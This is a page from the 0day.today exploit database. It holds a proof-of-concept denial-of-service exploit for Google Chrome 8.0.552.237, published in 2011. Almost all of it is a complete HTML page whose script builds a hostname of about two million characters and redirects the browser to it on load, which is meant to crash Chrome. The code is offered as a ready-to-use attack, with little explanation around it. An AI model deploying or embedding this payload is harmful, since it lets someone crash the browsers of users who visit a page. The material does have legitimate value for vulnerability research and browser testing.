[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Google Chrome v8.0.552.237 address overflow DoS

Author
Vuk Ivanovic
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-15428
Category
dos / poc
Date add
19-01-2011
Platform
windows
<html>
<head>
 
 
# Title: Google Chrome v8.0.552.237 address overflow DoS
 
# CVE-ID: ()
 
# OSVDB-ID: ()
 
# Author: Vuk Ivanovic
 
# Published: 2011-01-17
 
# Verified: yes
  
 
# Google Chrome v8.0.552.237 address overflow DoS
 
 
#
# Tested on: Windows XP, SP2 (EN), Windows 7 x64
 
#
# Date tested: 01/16/2011
#
#
#
 
# Discovered by: Vuk Ivanovic(musashi42)
#
##
 
<script type="text/javascript">
 
function mul3 (str, num) {
    if (!num) return "";
    var orig = str,
        soFar = [str],
        added = 1,
        left, i;
    while (added < num) {
        left = num - added;
        str = orig;
        for (i = 2; i < left; i *= 2) {
            str += str;
        }
        soFar.push(str);
        added += (i / 2);
    }
    return soFar.join("");
 
}
 
var junka = "a";
 
var junk = mul3(junka,2097033);
 
 
window.location.href = "http://" + junk;
 
 
</script>
</head>
 
<body>
 
</body>
</html>



#  0day.today [2024-11-16]  #